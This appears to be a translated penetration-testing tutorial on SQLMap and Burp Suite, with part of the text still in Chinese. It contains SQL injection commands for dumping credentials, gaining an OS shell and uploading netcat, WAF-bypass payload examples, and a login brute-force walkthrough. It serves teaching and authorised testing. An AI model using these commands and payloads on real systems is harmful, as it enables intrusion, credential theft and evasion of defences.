SQLMap
1.SQLMap detailed explanation
SQLMap is an automated SQL injection tool. Its main function is to scan, discover and exploit SQL injection vulnerabilities in a given URL. It has many built-in bypass plug-ins. The supported databases are MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. SQLMap uses the following 5 unique SQL injection techniques. ● Blind injection based on Boolean type, that is, injection that can determine whether the condition is true or false based on the returned page.
● Time-based blind injection means that you cannot judge any information based on the content returned by the page. You must use conditional statements to check whether the time delay statement has been executed (that is, whether the page return time has increased).
● Injection based on error reporting, that is, the page will return error information, or the result of the injected statement will be returned directly to the page.
● Union query injection, injection when Union can be used.
● Heap query injection, which can be injected when multiple statements are executed at the same time.
SQLMap's powerful features include database fingerprinting, database enumeration, data extraction, access to target file systems, and execution of arbitrary commands with full operating permissions. The function of SQLMap is amazing. When conventional injection tools cannot exploit SQL injection vulnerabilities, using SQLMap will have unexpected effects.
2.Install SQLMap
The installation of SQLMap requires a Python environment (Python 3 is not supported). Currently, Python 2.7.3 is used. You can download the installation package from the official website and install it with one click. After the installation is completed, copy the Python installation directory and add it to the environment variable value. As shown below:
Then download the latest version of SQLMap from the official website of SQLMap (http://www.sqlmap.org), download it to the Python installation directory, and add the SQLMap directory to the environment variable. Open cmd, enter the sqlmap.py command and the tool will run normally, as shown in the following figure:
3. Getting started with SQLMap
1. Determine whether there is injection
Assume that the target injection point is http://192.168.1.104/sql1/Less-1/? id=11. The command to determine whether there is injection is as follows:
sqlmap.py -u http://192.168.1.104/sql1/Less-1/? id=1
The results show that there is an injection, as shown in the image below:
In another case, when the parameters after the injection point are greater than or equal to two, double quotes are required, as shown below.
sqlmap.py -u "http://192.168.1.104/sql1/Less-1/? id=1&uid=2 "
As you can see, after running the statement to determine whether there is injection, a large piece of code "explodes". Let's analyze the information fed back to us by the code. There are three places to choose here: the first one means that the database may be MySQL, whether it is necessary to skip detecting other databases; the second one means whether to use MySQL in the case of "level1, risk1" All payloads are tested; the third point means that there is a vulnerability in the parameter ID. If you want to continue to detect other parameters, generally press the Enter key by default, as shown in the following figure:
2. Determine whether there is injection in the request in the text
Load HTTP requests from files. SQLMap can obtain HTTP requests from a text file, so that other parameters (such as cookies, POST data, etc.) can not be set. The content in the txt file is a Web data packet, as shown in the following figure:
The command to determine whether there is injection is as follows. The result after running is as shown in the figure below. -r is generally used when there is cookie injection.
3. Query all databases under the current user
This command is used to query all databases under the current user after confirming that the website has been injected, as shown below. If the current user has permission to read the table containing all database list information, use this command to list all databases, as shown below:
sqlmap.py -u http://192.168.1.104/sql1/Less-1/? id=1 --dbssqlmap.py -u http://192.168.1.104/sql1/Less-1/? id=1 --dbs
As you can see from the picture below, 17 databases and the names of all databases were queried. When continuing to inject, -dbs is abbreviated to -D xxx, which means to continue querying other data in the xxx database.
4. Get the table name in the database
The function of this command is to query all table names in the specified database after querying the database, as shown below. If you do not add the -D parameter to this command to specify a specific database, then SQLMap will list the tables of all libraries in the database, as shown below:
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" -D dkeye --tables
From the picture above, you can see the three table names in the dkeye database. When continuing to inject, –tables is abbreviated to -T, which means to continue querying in a certain table.
5. Get the field names in the table
The function of this command is to query all field names in the table after querying the table name, as shown below. The results of running this command are as follows:
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1"-D dkeye -T user\_info --columns
As you can see from the picture above, there are a total of 4 fields in the user_info table in the dkeye database. In subsequent injections, –columns is abbreviated to -C.
6. Get field content
This command is to obtain the specific data information in the field after querying the field name, as shown below:
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" -D dkeye -T user\_info -C username, password --dump
The data that needs to be downloaded here is the username and password values in the user_info table in the dkeye database, as shown in the following figure:
7. Get all users of the database
What this command does is list all users of the database as shown below. When the current user has permission to read the table containing all users, use this command to list all administrative users.
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" --userssqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" --users
As you can see, the current user account is root, as shown in the figure below:
8. Get the password of the database user
What this command does is list the passwords of the database users as shown below. If the current user has permission to read the user password, SQLMap will first list the user, then list the hash, and try to crack it.
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" --passwords
As you can see from the picture below, the password is encrypted using MySQL5 and can be decrypted by yourself in www.cmd5.com.
9. Get the name of the current website database
Use this command to list the databases used by the current website, as shown below.
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" --current-db
You can see from the picture below that the database is 'sql'.
10. Get the user name of the current website database
Use this command to list the database users used by the current website, as shown below.
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" --current-user
As you can see from the picture below, the user is root.
4.SQLMap advanced
1.–level 5: detection level
The parameter –level 5 refers to the test level that needs to be executed. There are 5 levels (1 to 5) in total. Level can be omitted. The default is 1. The payload used by SQLMap can be seen in xml/payloads.xml, or you can add your own payload according to the corresponding format. Level 5 contains the most payloads and will automatically crack cookie, XFF and other header injections. Of course, level 5 also runs slower. This parameter will affect the injection point of the test. GET and POST data will be tested. HTTP cookie will be tested when level is 2. HTTP User-Agent/Referer header will be tested when level is 3. In short, when you are not sure which payload or parameter is the injection point, in order to ensure comprehensiveness, it is recommended to use a high level value.
2.–is-dba: Whether the current user has administrative rights
This command is used to check whether the current account is a database administrator account, as shown below. If you enter this command in this case, True will be returned, as shown below:
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" --is-dba
3.–roles: List database administrator roles
This command is used to view the roles of database users. If the current user has permission to read the table containing all users, entering this command will list the roles of each user. You can also use the -U parameter to specify which user's role you want to see. This command only applies when the current database is Oracle. The result of entering this command in this case is as shown below:
4.–referer:HTTP Referer header
SQLMap can forge the referer in HTTP in the request. When the –level parameter is set to 3 or above, it will try to inject the referer. You can use the referer command to spoof, such as –refererhttp://www.baidu.com.
5.–sql-shell: Run custom SQL statements
This command is used to execute the specified SQL statement, as shown below. Assume that the select*from users limit 0,1 statement is executed, and the result is as shown in the figure below:
sqlmap.py -u "http://192.168.1.7/sql/union.php? id=1" --sql-shell
6. –os-cmd, --os-shell: Run any operating system command
When the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has permission to use specific functions, if the database is MySQL, PostgreSQL, SQLMap uploads a binary library containing the user-defined functions sys_exec() and sys_eval(), then The two functions created can execute system commands. In Microsoft SQL Server, SQLMap will use the xp_cmdshell stored procedure. If it is disabled (disabled by default in Microsoft SQL Server 2005 and above), SQLMap will re-enable it; if it does not exist, it will be automatically created. Use the –os-shell parameter to simulate a real Shell and enter the command you want to execute. When multiple statements cannot be executed (for example, the backend database of PHP or ASP is MySQL), you can still use INTO OUTFILE to write into a writable directory and create a Web backdoor. –os-shell supports four languages: ASP, ASP.NET, JSP and PHP (if you want to change parameters, you need database administrator rights, that is, the value of –is-dba must be True).
7.–file-read: Read files from the database server
This command is used to read the execution file. When the database is MySQL, PostgreSQL or Microsoft SQL Server, and the current user has permission to use specific functions, the read file can be a text or a binary file. Let's take Microsoft SQL Server 2005 as an example to review the usage of the --file-read parameter.
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get\_str2.asp? name=luther" \\ --file-read "C:/example.exe" -v 1
\[...\]
\[hh:mm:49\] \[INFO\] theback-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
\[hh:mm:50\] \[INFO\] fetching file: 'C:/example.exe'
\[hh:mm:50\] \[INFO\] theSQL query provided returns 3 entries C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C\_\_example.exe'
\[...\]
$ ls -l output/192.168.136.129/files/C\_\_example.exe
\-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C\_\_example.exe
$ file output/192.168.136.129/files/C\_\_example.exe output/192.168.136.129/files/C\_\_example.exe: PE32 executable for MS Windows (GUI)
Intel
80386 32-bit
8.–file-write–file-dest: Upload files to the database server
This command is used to write a local file to the server. When the database is MySQL, PostgreSQL or Microsoft SQL Server, and the current user has permission to use specific functions, the uploaded file can be a text or a binary file. Let’s review the usage of the –file-write–file-dest parameter with a MySQL example.
$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
$ ls -l /software/nc.exe.packed
\-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm/software/nc.exe.packed
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get\_int.aspx? id=1" --file-write \\ "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
\[...\]
\[hh:mm:29\] \[INFO\] the back-endDBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL > = 5.0.0
\[...\]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe'has been successfully
written on the back-end DBMS file system? \[Y/n\] y
\[hh:mm:52\] \[INFO\] retrieved: 31744
\[hh:mm:52\] \[INFO\] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/software/nc.exe.packed'
5. Bypass script tamper
By default, SQLMap does not modify the injected data except using the CHAR() function to prevent single quotes. Readers can also use the –tamper parameter to modify the data to bypass WAF and other devices. Most of the scripts mainly use regular modules. Try to bypass the WAF detection rules by replacing the character encoding of the attack payload. The command is as follows:
sqlmap.py XXXXX --tamper "模块名"
Currently, 53 official bypass scripts are provided. The following is the format of a tamper script.
\# sqlmap/tamper/escapequotes.py
from lib.core.enums import PRIORITY
\_\_priority\_\_ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, \*\*kwargs):
return payload.replace("'",
"\\\\'").replace('"', '\\\\"')
It is not difficult to see that a minimal tamper script structure is the priority variable definition and the dependencies and tamper function definitions. ● priority defines the priority of the script, which is used when there are multiple tamper scripts. ● The dependencies function declares the applicable/inapplicable scope of the script and can be empty. The following is a script that converts uppercase characters to bypass as an example. The tamper bypass script mainly consists of two functions: dependencies and tamper. The def tamper(payload, kwargs) function receives payload and kwargs and returns a Payload. The following code means to match all characters through regular expressions and convert all characters in the attack payload into uppercase letters.
def tamper(payload, \*\*kwargs):
retVal = payload
if payload:
for match in re.finditer(r"\[A-Za-z\_\]+", retVal):
word = match.group()
if word.upper() in kb.keywords:
retVal = retVal.replace(word, word.upper())
return retVal
In daily use, we will test whether some websites have security protection (WAF/IDS/IPS). You can use the parameter –identify-waf to detect.
Here are some commonly used tamper scripts.
● apostrophemask.py
Function: Replace quotation marks with UTF-8, used to filter single quotation marks.
The statements before using the script are:
1 AND '1'='1
After using the script, the statement is:
1 AND %EF%BC%871%EF%BC%87=%EF%BC%871
● base64encode.py
Function: Replace with base64 encoding. The statements before using the script are:
1' AND SLEEP(5)#
After using the script, the statement is:
MScgQU5EIFNMRUVQKDUpIw==
● multiplespaces.py
Function: Add multiple spaces around SQL keywords. The statements before using the script are:
1 UNION SELECT foobar
After using the script, the statement is:
1 UNION SELECT foobar
● space2plus.py
Function: Replace spaces with + sign.
The statements before using the script are:
SELECT id FROM users
After using the script, the statement is:
SELECT+id+FROM+users
● nonrecursivereplacement.py
Function: As a double query statement, use double statements to replace predefined SQL keywords (suitable for very weak custom filters, such as replacing SELECT with empty).
The statements before using the script are:
1 UNION SELECT 2--
After using the script, the statement is:
1 UNIOUNIONN SELESELECTCT 2--
● space2randomblank.py
Function: Replace spaces with other valid characters.
The statements before using the script are:
SELECT id FROM users
After using the script, the statement is:
SELECT%0Did%0DFROM%0Ausers
● unionalltounion.py
Function: Replace UNION ALL SELECT with UNION SELECT.
The statements before using the script are:
\-1 UNION ALL SELECT
After using the script, the statement is:
\-1 UNION SELECT
● securesphere.py
Function: Append a specially crafted string.
The statements before using the script are:
1 AND 1=1
After using the script, the statement is:
1 AND 1=1 and '0having'='0having'
● space2hash.py
Function: Replace spaces with # signs and add a random string and newline character.
The statements before using the script are:
1 AND 9227=9227
After using the script, the statement is:
1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227
● space2mssqlblank.py(mssql)
Function: Replace spaces with other empty symbols.
The statements before using the script are:
SELECT id FROM users
After using the script, the statement is:
SELECT%0Eid%0DFROM%07users
● space2mssqlhash.py
Function: Replace spaces with # signs and add a newline character.
The statements before using the script are:
1 AND 9227=9227
After using the script, the statement is:
1%23%0AAND%23%0A9227=9227
● between.py
Function: Replace the greater than sign (>) with NOT BETWEEN 0 AND, and replace the equal sign (=) with BETWEEN AND.
The statements before using the script are:
1 AND A > B--
After using the script, the statement is:
1 AND A NOT BETWEEN 0 AND B--
The statements before using the script are:
1 AND A = B--
After using the script, the statement is:
1 AND A BETWEEN B AND B--
● percentage.py
Function: ASP allows adding a % sign in front of each character.
The statements before using the script are:
SELECT FIELD FROM TABLE
After using the script, the statement is:
%S%E%L%E%C%T%F%I%E%L%D%F%R%O%M%T%A% B%L%E
● sp_password.py
Function: Append sp_password from the payload of automatic obfuscation of DBMS logs.
The statements before using the script are:
1 AND 9227=9227--
After using the script, the statement is:
1 AND 9227=9227-- sp\_password
● charencode.py
Function: Use URL encoding for all characters of the given Payload (do not process encoded characters).
The statements before using the script are:
SELECT FIELD FROM%20TABLE
After using the script, the statement is:
%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
● randomcase.py
Function: Randomize the case.
The statements before using the script are:
INSERT
After using the script, the statement is:
InsERt
● charunicodeencode.py
Function: String unicode encoding.
The statements before using the script are:
SELECT FIELD%20FROM TABLE
After using the script, the statement is:
%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045
● space2comment.py
作用:将空格替换为/\*\*/
使用脚本前的语句为:
SELECT id FROM users
使用脚本后,语句为:
SELECT/\*\*/id/\*\*/FROM/\*\*/users
● equaltolike.py
作用:将等号替换为like。
使用脚本前的语句为:
SELECT \* FROM users WHERE id=1
使用脚本后,语句为:
SELECT \* FROM users WHERE id LIKE 1
● greatest.py
作用:绕过对“>”的过滤,用GREATEST替换大于号。
使用脚本前的语句为:
1 AND A > B
使用脚本后,语句为:
1 AND GREATEST(A, B+1)=A
Database types and versions that passed the test:
● MySQL 4、MySQL 5.0和MySQL 5.5
● Oracle 10g
● PostgreSQL 8.3、PostgreSQL 8.4和PostgreSQL 9.0
● ifnull2ifisnull.py
作用:绕过对IFNULL的过滤,替换类似IFNULL(A, B)为IF(ISNULL(A), B, A)。
使用脚本前的语句为:
IFNULL(1, 2)
使用脚本后,语句为:
IF(ISNULL(1),2,1)
测试通过的数据库类型和版本为MySQL 5.0和MySQL 5.5。
● modsecurityversioned.py
作用:过滤空格,使用MySQL内联注释的方式进行注入。
使用脚本前的语句为:
1 AND 2>1--
使用脚本后,语句为:
1 /\*!30874AND 2>1\*/--
测试通过的数据库类型和版本为MySQL 5.0。
● space2mysqlblank.py
作用:将空格替换为其他空白符号(适用于MySQL)。
使用脚本前的语句为:
SELECT id FROM users
使用脚本后,语句为:
SELECT%A0id%0BFROM%0Cusers
测试通过的数据库类型和版本为MySQL 5.1。
● modsecurityzeroversioned.py
作用:使用MySQL内联注释的方式(/\*!00000\*/)进行注入。
使用脚本前的语句为:
1 AND 2>1--
使用脚本后,语句为:
1 /\*!00000AND 2>1\*/--
测试通过的数据库类型和版本为MySQL 5.0。
● space2mysqldash.py
作用:将空格替换为--,并添加一个换行符。
使用脚本前的语句为:
1 AND 9227=9227
使用脚本后,语句为:
1--%0AAND--%0A9227=9227
● bluecoat.py
作用:在SQL语句之后用有效的随机空白符替换空格符,随后用LIKE替换等于号。
使用脚本前的语句为:
SELECT id FROM users where id = 1
使用脚本后,语句为:
SELECT%09id FROM%09users WHERE%09id LIKE 1
测试通过的数据库类型和版本为MySQL 5.1和SGOS。
● versionedkeywords.py
作用:注释绕过。
使用脚本前的语句为:
UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58), IFNULL(CAST(CURRENT\_
USER() AS CHAR), CHAR(32)), CH/\*\*/AR(58,100,114, 117,58))#
使用脚本后,语句为:
/\*! UNION\*\*! ALL\*\*! SELECT\*\*! NULL\*/, /\*! NULL\*/, CONCAT(CHAR(58,104,116,116,58),
IFNULL(CAST(CURRENT\_USER()/\*! AS\*\*! CHAR\*/), CHAR(32)), CHAR(58,100,114,117,58))#
● halfversionedmorekeywords.py
作用:当数据库为MySQL时绕过防火墙,在每个关键字之前添加MySQL版本注释。
使用脚本前的语句为:
value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58), IFNULL(CAST(CURRENT\_USER() AS CHAR), CHAR(32)), CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
使用脚本后,语句为:
value'/\*!0UNION/\*!0ALL/\*!0SELECT/\*!0CONCAT(/\*!0CHAR(58,107,112,113,58), /\*!0IFNULL(CAST(/\*!0CURRENT\_USER()/\*!0AS/\*!0CHAR), /\*!0CHAR(32)), /\*!0CHAR(58,97,110,121,58)), /\*!0NULL, /\*!0NULL#/\*!0AND 'QDWa'='QDWa
测试通过的数据库类型和版本为MySQL 4.0.18和MySQL 5.0.22。
● space2morehash.py
作用:将空格替换为#号,并添加一个随机字符串和换行符。
使用脚本前的语句为:
1 AND 9227=9227
使用脚本后,语句为:
1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23 lujYFWfv%0A9227=9227
测试通过的数据库类型和版本为MySQL 5.1.41。
● apostrophenullencode.py
作用:用非法双字节unicode字符替换单引号。
使用脚本前的语句为:
1 AND '1'='1
使用脚本后,语句为:
1 AND %00%271%00%27=%00%271
● appendnullbyte.py
作用:在有效负荷的结束位置加载零字节字符编码。
使用脚本前的语句为:
1 AND 1=1
使用脚本后,语句为:
1 AND 1=1%00
● chardoubleencode.py
作用:对给定的Payload全部字符使用双重URL编码(不处理已经编码的字符)。
使用脚本前的语句为:
SELECT FIELD FROM%20TABLE
使用脚本后,语句为:
%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
● unmagicquotes.py
作用:用一个多字节组合(%bf%27)和末尾通用注释一起替换空格。
使用脚本前的语句为:
1' AND 1=1
使用脚本后,语句为:
1%bf%27--
● randomcomments.py
作用:用/\*\*/分割SQL关键字。
使用脚本前的语句为:
INSERT
使用脚本后,语句为:
IN/\*\*/S/\*\*/ERT
Although the tamper that comes with SQLMap can do many things, in the actual environment, it is often more complex and you may encounter many situations. The tamper cannot fully cope with various environments, so it is recommended to learn how to use the built-in tamper. At the same time, it is best to master the writing rules of tamper, so that you can be more efficient when dealing with various actual combat environments.
Burp Suite
1.Installation of Burp Suite
Burp Suite is an integrated penetration testing tool that includes many functions that can help us efficiently complete penetration testing and attacks on web applications.
Burp Suite is written in Java language and is based on Java's own cross-platform nature, making this software more convenient to learn and use. Unlike other automated testing tools, Burp Suite requires manual configuration of some parameters and triggers some automated processes before it starts working.
The Burp Suite executable program is a jar file of Java file type, and the free version can be downloaded from the official website. The free version of Burp Suite has many limitations and cannot use many advanced tools. If you want to use more advanced features, you need to pay for the professional version. The main differences between the professional version and the free version are as follows:
● Burp Scanner。
● Save and restore workspace.
● Extension tools, such as Target Analyzer, Content Discovery and Task Scheduler.
Burp Suite is developed in Java language and relies on JRE when running. It requires a Java environment to be installed before it can run. Use Baidu to search for JDK, select the installation package and download it. After opening the installation package, click the "Next" button to install (the installation path can be changed by yourself or use the default path). After prompting that the installation is complete, open cmd and enter java-version to view. If the version information is returned, it means that it has been installed correctly, as shown in the following figure:
Next, configure the environment variables, right-click "Computer", then click "Properties" → "Advanced System Settings" → "Environment Variables", then create a new system variable, enter "JAVA_HOME" in the "Variable Name" of the pop-up box, and Enter the JDK installation path in "Variable Value", such as "C:\Program Files(x86)\Java\jdk1.8.0_112", and then click the "OK" button.
Find the PATH variable in "System Variables", add "%JAVA_HOME%\bin;" at the front of "Variable Value", and then click the "OK" button.
Find the CLASSPATH variable in "System Variables". If it does not exist, create a new variable and add ".; %JAVA_HOME%\lib\dt.jar; %JAVA_HOME%\lib\tools.jar" at the front of "Variable Value" ;" and click the "OK" button.
Open cmd and enter javac. If a help message is returned, as shown in the figure below, it means that the environment variables have been configured correctly.
There is no need to install the downloaded Burp. Just double-click the BurpLoader.jar file to run it, as shown in the figure below:
2. Getting started with Burp Suite
The Burp Suite proxy tool intercepts all network traffic passing through the proxy, such as client request data, server return information, etc. Burp Suite mainly intercepts HTTP and HTTPS protocol traffic. Through interception, Burp Suite uses a middleman to process the client's request data and the server's return information to achieve the purpose of security testing.
In daily work, the most commonly used Web client is a Web browser. We can intercept the traffic of the Web browser by setting proxy information, and process the traffic data proxied by Burp Suite. After BurpSuite is running, the default local proxy port of Burp Proxy is 8080, as shown in the following figure:
Taking the Firefox browser as an example, click "Open Menu" in the upper right corner of the browser, click "Options" → "General" → "Network Proxy" → "Settings" → "Manual Configuration Proxy", as shown in the figure below. Set the HTTP proxy to 127.0.0.1 and the port to 8080, consistent with the proxy in Burp Proxy.
2.1 Proxy
Burp Proxy is the core of the testing process using Burp. Through the proxy mode, we can intercept, view, and modify all data transmitted between the client and the server.
The interception function of Burp Proxy mainly consists of Forward, Drop, Interception is on/off and Action in the Intercept tab. Their functions are as follows:
● Forward means sending intercepted data packets or modified data packets to the server.
● Drop means discarding the currently intercepted data packet.
● Interception is on means that the interception function is turned on. After clicking, it changes to Interception is off, which means that the interception function is turned off.
● Click the Action button to further send the data packet to functional components such as Spider, Scanner, Repeater, Intruder, etc. for further testing. It also includes functions such as changing the data packet request method and body encoding.
Open the browser, enter the URL you want to access and press Enter. You will see that the data traffic passes through Burp Proxy and is paused until you click the Forward button to continue transmission. If the Drop button is clicked, the data passed this time will be lost and will not be processed further.
After the client and server intercepted by Burp Suite interact, we can view the entity content, message headers, request parameters and other information of the request in the message analysis option of Burp Suite. Burp has four message types to display data packets: Raw, Params, Headers and Hex.
● Raw mainly displays the raw format of Web requests and displays data packets in plain text, including request address, HTTP protocol version, host header, browser information, Accept acceptable content type, character set, encoding method, cookie, etc., which can Perform penetration testing on the server side by manually modifying this information.
● Params mainly displays parameter information requested by the client, including parameters of GET or POST requests and cookie parameters. Penetration testing on the server side can be completed by modifying these request parameters.
● Headers displays the header information in the data packet, displaying the data packet in the form of name and value.
● Hex corresponds to the binary content of the information in Raw. The requested content can be modified through the Hex editor. It is very useful when truncating 00, as shown in the following figure:
2.2 Spider
Spider's spider crawling function can help us understand the structure of the system. The content crawled by Spider will be displayed in Target, as shown in the figure below. The left side of the interface is a host and directory tree. Select a specific branch to view the corresponding requests and responses.
2.3 Decoder
The function of Decoder is relatively simple. It is the encoding, decoding and hash conversion tool that comes with Burp. It can convert the original data into various encoding formats and hash.
The interface of Decoder is shown in the figure below. The input field displays the original data that needs to be encoded/decoded. You can fill in or paste it directly here, or send it through the "Send toDecoder" option in the context menu of other Burp tools; the output field displays the original data in the input field. The result of encoding/decoding. Both the input field and the output field support two formats: text and Hex. The encoding and decoding options consist of decoding options (Decode as), encoding options (Encode as), and hashing (Hash). In actual use, it can be set according to the needs of the scene.
In terms of encoding and decoding options, eight format conversions are currently supported: URL, HTML, Base64, ASCII, hexadecimal, octal, binary and GZIP. Hash hash supports SHA, SHA-224, SHA-256, SHA -384, SHA-512, MD2, MD5 format conversion. More importantly, for the same data, we can perform multiple encoding and decoding conversions on the Decoder interface.
3.Burp Suite advanced
3.1 Scanner
Burp Scanner is mainly used to automatically detect various vulnerabilities in Web systems. This section introduces the basic usage of Burp Scanner. It may change in actual use, but the general steps are as follows.
First, confirm that Burp Suite starts normally and completes the browser proxy configuration. Then enter Burp Proxy, turn off the proxy interception function, and quickly browse the domains or URL modules that need to be scanned. At this time, by default, Burp Scanner will scan requests through the proxy service and analyze the request messages to identify whether there are system vulnerabilities. . And when we open Burp Target, the requested URL tree will also be displayed in the site map.
We randomly find a website for testing, select the link under the site map option of Burp Target, right-click on the link URL and select "Actively scan this host". The filtering settings will pop up. Keep the default options to scan the entire domain. As shown below:
You can also select the link URL on a node in the HTTP history under Proxy and right-click to select Do an active scan to scan, as shown in the following figure:
At this time, Burp Scanner starts scanning. Double-click on the Scanner interface to see the scanning results, as shown in the following figure:
We can also select the part that needs to be analyzed in the scan results and send it to the repeater module for simulation submission analysis and verification, as shown in the following figure:
When the scanner scan is completed, you can right-click the link under the Burp Target site map option, select the "issues" → "Report issues" option, and then export the vulnerability report, as shown in the following figure:
Then save the vulnerability report in html file format, and the result is as shown below:
Through the above steps, we can learn: Burp Scanner mainly has two scanning methods: active scanning and passive scanning.
1. Active Scanning
When using active scanning mode, Burp will send a new request to the application and verify the vulnerability through the payload. Operations in this mode will generate a large amount of request and response data, which directly affects the performance of the server. It is usually used in non-production environments. Active scanning applies to the following two types of vulnerabilities.
● 客户端的漏洞,如XSS、HTTP头注入、操作重定向。
● 服务端的漏洞,如SQL注入、命令行注入、文件遍历。
For the first type of vulnerability, Burp will submit the input field during detection, and then parse it based on the response data. During the detection process, Burp will modify the basic request information, that is, modify the parameters according to the characteristics of the vulnerability, and simulate human behavior to achieve the purpose of detecting vulnerabilities; for the second type of vulnerability, taking SQL injection as an example, the service The client may return a database error message, or may not return anything at all. During the detection process, Burp will use various techniques to verify the existence of vulnerabilities, such as inducing time delays, forcibly modifying Boolean values, and comparing with fuzz testing results to improve the accuracy of vulnerability scanning reports.
2. Passive Scanning
When using passive scanning mode, Burp will not resend new requests, but only analyze existing requests and responses. This is safer for server-side detection and is usually suitable for detection in production environments. Generally speaking, the following vulnerabilities are easily detected in passive mode.
● 提交的密码为未加密的明文。
● 不安全的cookie的属性,例如缺少HttpOnly和安全标志。
● cookie的范围缺失。
● 跨域脚本包含和站点引用泄露。
● 表单值自动填充,尤其是密码。
● SSL保护的内容缓存。
● 目录列表。
● 提交密码后应答延迟。
● session令牌的不安全传输。
● 敏感信息泄露,例如内部IP地址、电子邮件地址、堆栈跟踪等信息泄露。
● 不安全的ViewState的配置。
● 错误或不规范的Content-Type指令。
Although the passive scanning mode has many shortcomings compared to the active mode, it also has advantages that the active mode does not have. In addition to the safer detection of the server, when the test of a certain business scenario will destroy certain aspects of the business scenario every time, you can use the passive scanning mode to verify whether there are vulnerabilities to reduce the risk of testing.
3.2 Intruder
Intruder is a custom, highly configurable tool that can perform automated attacks on web applications, such as username, ID and account number enumeration by identifier, fuzz testing, SQL injection, cross-site, directory traversal, etc.
Its working principle is that Intruder obtains different request responses by modifying various request parameters based on the original request data. In each request, Intruder usually carries one or more effective attack loads (Payload), replays the attack at different locations, and obtains the required characteristic data through comparison and analysis of the response data. Burp Intruder is usually used in the following scenarios.
● Identifier enumeration. Web applications often use identifiers to reference data information such as users, accounts, assets, etc. For example, username, file ID, and account number.
● Extract useful data. In some scenarios, instead of simply identifying valid identifiers, other data can be extracted through simple identifiers. For example, obtain the name and age of all users in their personal space through the user's personal space ID.
● Fuzz testing. Many input vulnerabilities (such as SQL injection, cross-site scripting, and file path traversal) can be detected by submitting various test strings through request parameters and analyzing error messages and other anomalies. Due to the size and complexity of the application, performing this test manually is a time-consuming and cumbersome process, so you can set up a payload to automatically fuzz the web application through Burp Intruder.
The following will demonstrate the method of using the Intruder module to blast websites without verification codes and frequency limits, as shown in the figure below. The method used here is only for experimentation. Readers are not allowed to use it for other illegal purposes. The premise is that you must have a better dictionary. The dictionary we prepared is as shown in the figure below. It should be noted that Burp Suite files should not be placed in Chinese paths.
First send the packet to the intruder module
Burp will automatically mark certain parameters. Here, clear all marks first.
Then select the parameter value to be violently cracked, select the pass parameter, and click the "Add$" button. Only one parameter is violently cracked here, so use sniper for the attack type, as shown in the figure below. What should be noted here is that if you want to crack the user name and password at the same time, you can select the user and pass parameters at the same time, and select the cross-cluster bomb mode for brute force cracking.
● Sniper mode uses a single Payload group. It sets the payload for each location. This type of attack is suitable for scenarios where request parameters in common vulnerabilities are individually fuzzed. The total number of requests in the attack should be the product of the number of positions and the number of payloads.
● Battering ram mode uses a single Payload group. It will repeat the payload and put all the same payload into the specified location at once. This attack is suitable for situations where the same input needs to be placed in multiple places in the request. The total number of requests is the total number of payloads in the payload group.
● Pitchfork mode uses multiple Payload groups. The attack will iterate through all payload groups simultaneously and place the payload into each defined location. This attack type is ideal for situations where different but similar inputs need to be inserted in different locations. The requested quantity should be the number of payloads in the smallest payload group.
● Cluster bomb mode uses multiple Payload groups. There are different payload groups in each defined location. The attack will iterate through each payload group, and each payload combination will be tested. This attack is suitable for scenarios that require different and unrelated or unknown input attacks in the location. The total number of attack requests is the product of the number of payloads in each payload group.
Select the dictionary to add below
Then start blasting and wait for the blasting to end
Here, sort the return values of Status or Length to see if there are any differences. If so, check whether the returned packet shows successful login. If there is obvious login successful information in the returned data packet, it means that the crack has been successful, as shown in the following figure:
3.3 Repeater
Burp Repeater is a tool for manually modifying and re-issuing individual HTTP requests and analyzing their responses. Its greatest use is that it can be used in conjunction with other Burp Suite tools. You can send the target site map, Burp Proxy browsing history, and Burp Intruder attack results to Repeater, and manually adjust this request to fine-tune vulnerability detection or attack.
There are 4 Repeater analysis options: Raw, Params, Headers and Hex.
● Raw: Display messages in plain text format. There is a search and highlight function at the bottom of the text panel, which can be used to quickly locate the string you need to find, such as an error message. Using the popup to the left of the search bar, you can control the sensitivity of the condition and whether to search using simple text or hexadecimal.
● Params: For requests that contain parameters (URL query string, cookie header, or message body), the Params option will display these parameters in name/value format, so that they can be easily viewed and modified.
● Headers: HTTP message headers will be displayed in name/value format, and the message body will be displayed in original format.
